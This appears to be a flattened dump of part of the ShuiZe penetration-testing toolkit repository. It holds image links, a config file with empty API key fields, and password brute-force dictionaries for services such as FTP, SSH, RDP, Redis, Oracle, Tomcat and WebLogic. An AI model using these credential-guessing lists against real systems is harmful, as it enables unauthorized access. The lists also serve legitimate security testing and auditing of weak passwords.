--------------------------------------------------------------------------------
/imgs/image-20210728153419131.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728153419131.png
--------------------------------------------------------------------------------
/imgs/image-20210728154929084.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728154929084.png
--------------------------------------------------------------------------------
/imgs/image-20210728155358378.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155358378.png
--------------------------------------------------------------------------------
/imgs/image-20210728155541501-7458943.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155541501-7458943.png
--------------------------------------------------------------------------------
/imgs/image-20210728155541501.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155541501.png
--------------------------------------------------------------------------------
/imgs/image-20210728160705706.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728160705706.png
--------------------------------------------------------------------------------
/imgs/image-20210728161022348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161022348.png
--------------------------------------------------------------------------------
/imgs/image-20210728161117459.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161117459.png
--------------------------------------------------------------------------------
/imgs/image-20210728161339208.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161339208.png
--------------------------------------------------------------------------------
/imgs/image-20210728161507035.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161507035.png
--------------------------------------------------------------------------------
/imgs/image-20210728161711534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161711534.png
--------------------------------------------------------------------------------
/imgs/image-20210728162049962.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162049962.png
--------------------------------------------------------------------------------
/imgs/image-20210728162119531.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162119531.png
--------------------------------------------------------------------------------
/imgs/image-20210728162303312.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162303312.png
--------------------------------------------------------------------------------
/imgs/image-20210728162441132.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162441132.png
--------------------------------------------------------------------------------
/imgs/image-20210728162655684.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162655684.png
--------------------------------------------------------------------------------
/imgs/image-20210728163216047.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163216047.png
--------------------------------------------------------------------------------
/imgs/image-20210728163926763.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163926763.png
--------------------------------------------------------------------------------
/imgs/image-20210728163940918.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163940918.png
--------------------------------------------------------------------------------
/imgs/image-20210728164010063.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164010063.png
--------------------------------------------------------------------------------
/imgs/image-20210728164040649.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164040649.png
--------------------------------------------------------------------------------
/imgs/image-20210728164146630.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164146630.png
--------------------------------------------------------------------------------
/imgs/image-20210728164211552.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164211552.png
--------------------------------------------------------------------------------
/imgs/image-20210728164316747.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164316747.png
--------------------------------------------------------------------------------
/imgs/image-20210728164555141.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164555141.png
--------------------------------------------------------------------------------
/imgs/image-20210728164745820.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164745820.png
--------------------------------------------------------------------------------
/imgs/image-20210728164811422.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164811422.png
--------------------------------------------------------------------------------
/imgs/image-20210728164933353.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164933353.png
--------------------------------------------------------------------------------
/imgs/image-20210728165004202.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165004202.png
--------------------------------------------------------------------------------
/imgs/image-20210728165052361.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165052361.png
--------------------------------------------------------------------------------
/imgs/image-20210728165612314.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165612314.png
--------------------------------------------------------------------------------
/imgs/image-20210728170303756.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728170303756.png
--------------------------------------------------------------------------------
/imgs/image-20210728193058487.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728193058487.png
--------------------------------------------------------------------------------
/imgs/kuaidaili1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili1.png
--------------------------------------------------------------------------------
/imgs/kuaidaili2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili2.png
--------------------------------------------------------------------------------
/imgs/kuaidaili3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili3.png
--------------------------------------------------------------------------------
/imgs/kuaidaili4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili4.png
--------------------------------------------------------------------------------
/imgs/nuclei_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/nuclei_1.png
--------------------------------------------------------------------------------
/imgs/qianxinApi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/qianxinApi.png
--------------------------------------------------------------------------------
/imgs/qianxinApi2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/qianxinApi2.png
--------------------------------------------------------------------------------
/imgs/quakeApi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/quakeApi.png
--------------------------------------------------------------------------------
/imgs/quakeApi2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/quakeApi2.png
--------------------------------------------------------------------------------
/imgs/securitytrails.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/securitytrails.png
--------------------------------------------------------------------------------
/imgs/socksProxy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/socksProxy.png
--------------------------------------------------------------------------------
/imgs/xmind.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/xmind.png
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_ftp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin123
29 | admin888
30 | administrator
31 | administrator123
32 | ftp
33 | ftppass
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | user
60 | mysql
61 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_imap.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | 123456
28 | Passw0rd
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_imap_ssl.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | 123456
28 | Passw0rd
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
54 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_memcached.txt:
--------------------------------------------------------------------------------
1 | Passw0rd
2 | admin
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | 空
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | admin123
31 | admin888
32 | administrator
33 | administrator123
34 | root123
35 | 123456
36 | password
37 | 12345
38 | 1234
39 | root
40 | 123
41 | qwerty
42 | test
43 | 1q2w3e4r
44 | 1qaz2wsx
45 | qazwsx
46 | 123qwe
47 | 123qaz
48 | 0000
49 | oracle
50 | 1234567
51 | 123456qwerty
52 | password123
53 | 12345678
54 | 1q2w3e
55 | abc123
56 | okmnji
57 | test123
58 | 123456789
59 | q1w2e3r4
60 | user
61 | web
62 |
63 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_mongodb.txt:
--------------------------------------------------------------------------------
1 | ��
2 | admin
3 | mongodb
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | 空
22 | %user%~!@
23 | %user%!@#123
24 | Passw0rd
25 | qweasdzxc
26 | %user%2017
27 | %user%2016
28 | %user%2015
29 | %user%@2017
30 | %user%@2016
31 | %user%@2015
32 | admin123
33 | admin888
34 | administrator
35 | administrator123
36 | mongodb123
37 | mongodbpass
38 | 123456
39 | password
40 | 12345
41 | 1234
42 | root
43 | 123
44 | qwerty
45 | test
46 | 1q2w3e4r
47 | 1qaz2wsx
48 | qazwsx
49 | 123qwe
50 | 123qaz
51 | 0000
52 | oracle
53 | 1234567
54 | 123456qwerty
55 | password123
56 | 12345678
57 | 1q2w3e
58 | abc123
59 | okmnji
60 | test123
61 | 123456789
62 | q1w2e3r4
63 | user
64 | web
65 |
66 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_mysql.txt:
--------------------------------------------------------------------------------
1 | root
2 | 123456
3 | rootroot
4 | root123
5 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_oracle.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin
29 | sys
30 | system
31 | oracle
32 | dbadmin
33 | qweasdzxc
34 | admin123
35 | admin888
36 | administrator
37 | administrator123
38 | root123
39 | 123456
40 | password
41 | 12345
42 | root
43 | qwerty
44 | test
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | oracle
51 | 1234567
52 | 123456qwerty
53 | password123
54 | 12345678
55 | 1q2w3e
56 | abc123
57 | okmnji
58 | test123
59 | 123456789
60 | q1w2e3r4
61 | oracle
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_pop3.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_postgresql.txt:
--------------------------------------------------------------------------------
1 | admin
2 | Passw0rd
3 | postgres
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | admin123
31 | admin888
32 | administrator
33 | administrator123
34 | root123
35 | ftp
36 | ftppass
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | 123
43 | qwerty
44 | test
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | 0000
51 | oracle
52 | 1234567
53 | 123456qwerty
54 | password123
55 | 12345678
56 | 1q2w3e
57 | abc123
58 | okmnji
59 | test123
60 | 123456789
61 | q1w2e3r4
62 | user
63 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_rdp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin123!@#
29 | admin
30 | admin123
31 | admin@123
32 | admin#123
33 | 123456
34 | password
35 | 12345
36 | 1234
37 | root
38 | 123
39 | qwerty
40 | test
41 | 1q2w3e4r
42 | 1qaz2wsx
43 | qazwsx
44 | 123qwe
45 | 123qaz
46 | 0000
47 | oracle
48 | 1234567
49 | 123456qwerty
50 | password123
51 | 12345678
52 | 1q2w3e
53 | abc123
54 | okmnji
55 | test123
56 | 123456789
57 | postgres
58 | q1w2e3r4
59 | redhat
60 | user
61 | mysql
62 | apache
63 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_redis.txt:
--------------------------------------------------------------------------------
1 | Passw0rd
2 | admin
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | %user%!@#$
19 | %user%!@#
20 | %user%~!@
21 | %user%!@#123
22 | qweasdzxc
23 | %user%2017
24 | %user%2016
25 | %user%2015
26 | %user%@2017
27 | %user%@2016
28 | %user%@2015
29 | admin123
30 | admin888
31 | administrator
32 | administrator123
33 | root123
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | user
60 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_smtp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_sqlserver.txt:
--------------------------------------------------------------------------------
1 | sa
2 | 123456
3 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_ssh.txt:
--------------------------------------------------------------------------------
1 | Pwd@123
2 | root
3 | root123
4 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_svn.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | qwerty
32 | test123
33 | 1q2w3e4r
34 | 1qaz2wsx
35 | qazwsx
36 | 123qwe
37 | 123qaz
38 | 000000
39 | 88888888
40 | 666666
41 | 111111
42 | oracle
43 | 1234567
44 | 123456qwerty
45 | 12345678
46 | 1q2w3e
47 | abc123
48 | 123456789
49 | q1w2e3r4
50 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_telnet.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | qweasdzxc
28 | Passw0rd
29 | admin
30 | 123456
31 | password
32 | 12345
33 | 1234
34 | root
35 | 123
36 | qwerty
37 | test
38 | 1q2w3e4r
39 | 1qaz2wsx
40 | qazwsx
41 | 123qwe
42 | 123qaz
43 | 0000
44 | 1234567
45 | 123456qwerty
46 | password123
47 | 12345678
48 | 1q2w3e
49 | abc123
50 | okmnji
51 | test123
52 | 123456789
53 | q1w2e3r4
54 | apache
55 | qwer1234
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_tomcat.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | %user%!@#$
19 | %user%!@#
20 | %user%~!@
21 | %user%!@#123
22 | qweasdzxc
23 | %user%2017
24 | %user%2016
25 | %user%2015
26 | %user%@2017
27 | %user%@2016
28 | %user%@2015
29 | Passw0rd
30 | qweasdzxc
31 | admin123
32 | admin888
33 | administrator
34 | administrator123
35 | root123
36 | ftppass
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | qwerty
43 | test
44 | 1q2w3e4r
45 | 1qaz2wsx
46 | qazwsx
47 | 123qwe
48 | 123qaz
49 | 0000
50 | oracle
51 | 1234567
52 | 123456qwerty
53 | password123
54 | 12345678
55 | 1q2w3e
56 | abc123
57 | okmnji
58 | test123
59 | 123456789
60 | q1w2e3r4
61 | user
62 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_vnc.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | qweasdzxc
28 | Passw0rd
29 | admin123
30 | admin888
31 | administrator
32 | administrator123
33 | root123
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | qwer1234
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_weblogic.txt:
--------------------------------------------------------------------------------
1 | admin
2 | weblogic
3 | test
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | qweasdzxc
31 | Passw0rd
32 | admin123
33 | admin888
34 | administrator
35 | administrator123
36 | root123
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | 123
43 | qwerty
44 | test123
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | 0000
51 | oracle
52 | 1234567
53 | 123456qwerty
54 | password123
55 | 12345678
56 | 1q2w3e
57 | abc123
58 | okmnji
59 | test123
60 | 123456789
61 | q1w2e3r4
62 | webadmin
--------------------------------------------------------------------------------
/iniFile/SQLPayloads/blank.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/iniFile/config.ini:
--------------------------------------------------------------------------------
1 | [fofa api]
2 | EMAIL =
3 | KEY =
4 |
5 | [shodan api]
6 | SHODAN_API_KEY =
7 |
8 | [github api]
9 | GITHUB_TOKEN =
10 |
11 | [quake api]
12 | X-QuakeToken =
13 |
14 | [quake nums]
15 | quake_nums = 1000
16 |
17 | [qianxin api]
18 | api-key =
19 | qianxin_nums = 200
20 |
21 | [C nums]
22 | c_nums = 5
23 |
24 | [virustotal api]
25 | VIRUSTOTAL_API =
26 |
27 | [securitytrails api]
28 | Securitytrails_API =
29 |
